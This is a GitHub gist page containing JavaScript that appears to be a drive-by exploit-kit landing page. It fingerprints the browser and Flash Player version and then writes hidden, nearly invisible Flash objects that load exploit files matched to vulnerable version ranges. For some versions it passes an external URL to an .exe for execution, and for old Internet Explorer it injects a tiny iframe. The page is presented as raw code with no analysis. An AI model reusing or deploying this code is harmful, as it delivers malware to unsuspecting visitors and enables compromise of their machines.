This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script type="text/javascript"> | |
function flash_run(fu, fd) { | |
var f_use = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="60" height="1">'; | |
f_use = f_use + '<param name="movie" value="' + fu + '" />'; | |
f_use = f_use + '<param name="play" value="true"/>'; | |
f_use = f_use + '<param name=FlashVars value="' + fd + '" />'; | |
f_use = f_use + '<!--[if !IE]>-->'; | |
f_use = f_use + '<object type="application/x-shockwave-flash" data="' + fu + '" allowScriptAccess=always width="60" height="1">'; | |
f_use = f_use + '<param name="movie" value="' + fu + '" />'; | |
f_use = f_use + '<param name="play" value="true"/>'; | |
f_use = f_use + '<param name=FlashVars value="' + fd + '" />'; | |
f_use = f_use + '<!--<![endif]-->'; | |
f_use = f_use + '<!--[if !IE]>--></object><!--<![endif]-->'; | |
f_use = f_use + '</object>'; | |
document.write(f_use); | |
} | |
function flash_run2(fu) { | |
var f_use = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="60" height="1">'; | |
f_use = f_use + '<param name="movie" value="' + fu + '" />'; | |
f_use = f_use + '<param name="play" value="true"/>'; | |
f_use = f_use + '<!--[if !IE]>-->'; | |
f_use = f_use + '<object type="application/x-shockwave-flash" data="' + fu + '" allowScriptAccess=always width="60" height="1">'; | |
f_use = f_use + '<param name="movie" value="' + fu + '" />'; | |
f_use = f_use + '<param name="play" value="true"/>'; | |
f_use = f_use + '<!--<![endif]-->'; | |
f_use = f_use + '<!--[if !IE]>--></object><!--<![endif]-->'; | |
f_use = f_use + '</object>'; | |
document.write(f_use); | |
} | |
function CheckVersion11() { | |
if (apple.major != 11) return false; | |
if (apple.minor == 9 && apple.rev > 900) return false; | |
if (apple.minor > 2 && apple.rev > 202 && apple.nbwm > 406) return false; | |
return true; | |
} | |
function CheckVersion12() { | |
if (apple.major != 12) return false; | |
return true; | |
} | |
function CheckVersion13() { | |
if (apple.major != 13) return false; | |
if (apple.major == 13 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 241) return false; | |
return true; | |
} | |
function CheckVersion14() { | |
if (apple.major != 14) return false; | |
if (apple.major == 14 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 179) return false; | |
return true; | |
} | |
function CheckVersion15() { | |
if (apple.major != 15) return false; | |
if (apple.major == 15 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 167) return false; | |
return true; | |
} | |
function CheckVersion16() { | |
if (apple.major != 16) return false; | |
if (apple.major == 16 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 296) return false; | |
return true; | |
} | |
function CheckVersion17() { | |
if (apple.major != 17) return false; | |
if (apple.major == 17 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 134) return false; | |
return true; | |
} | |
function CheckVersion17s() { | |
if (apple.major != 17) return false; | |
if (apple.major == 17 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 188) return false; | |
return true; | |
} | |
function CheckVersion18() { | |
if (apple.major != 18) return false; | |
if (apple.major == 18 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 203) return false; | |
return true; | |
} | |
function CheckVersion21() { | |
if (apple.major != 21) return false; | |
if (apple.major == 21 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 213) return false; | |
return true; | |
} | |
var vers=flash.prototype.getSwfVer(); | |
vers=parseInt(vers.replace(/\.|\_/g,'')); | |
var kaka = navigator.userAgent.toLowerCase(); | |
var apple = deconcept.SWFObjectUtil.getPlayerVersion(); | |
if( (kaka.indexOf("nt 6")>-1 && kaka.indexOf("msie 8")==-1) && (vers > 2100180 && vers <= 2100213) ) | |
{ | |
flash_run2("cam_do.swf"); | |
} | |
else if( CheckVersion21() ) | |
{ | |
flash_run2("cam_do.swf"); | |
} | |
else if( (kaka.indexOf("nt 6")>-1 && kaka.indexOf("msie 8")==-1) && ((vers > 1700160 && vers <= 1700188) || (vers > 1800100 && vers <= 1800203)) ) | |
{ | |
flash_run2("bin_do.swf"); | |
} | |
else if( (kaka.indexOf("nt 6")>-1 && kaka.indexOf("msie 8")==-1) && ((vers > 1600100 && vers <= 1600296) || (vers > 1700100 && vers <= 1700134)) ) | |
{ | |
flash_run2("ad_do.swf"); | |
} | |
else if( (kaka.indexOf("nt 6")>-1 && kaka.indexOf("msie 8")>-1) && (CheckVersion17s() || CheckVersion18()) ) | |
{ | |
flash_run2("bin_do.swf"); | |
} | |
else if( (kaka.indexOf("nt 6")>-1 && kaka.indexOf("msie 8")>-1) && (CheckVersion16() || CheckVersion17()) ) | |
{ | |
flash_run2("ad_do.swf"); | |
} | |
else if( CheckVersion16() || CheckVersion17() || CheckVersion17s() || CheckVersion18() ) | |
{ | |
flash_run2("bin_do.swf"); | |
} | |
else if( CheckVersion11() || CheckVersion12() || CheckVersion13() || CheckVersion14() || CheckVersion15() ) | |
{ | |
flash_run("logo.swf", "exec=FmF" + "http://playnco.club/11.7/11.7.exe"); | |
} | |
else if( (kaka.indexOf("msie 6")>-1 || kaka.indexOf("msie 7")>-1) && apple.major==10 && apple.minor==3 && apple.rev<=183 ) | |
{ | |
document.write("<iframe src=ww.html width=30 height=1></iframe>"); | |
} | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment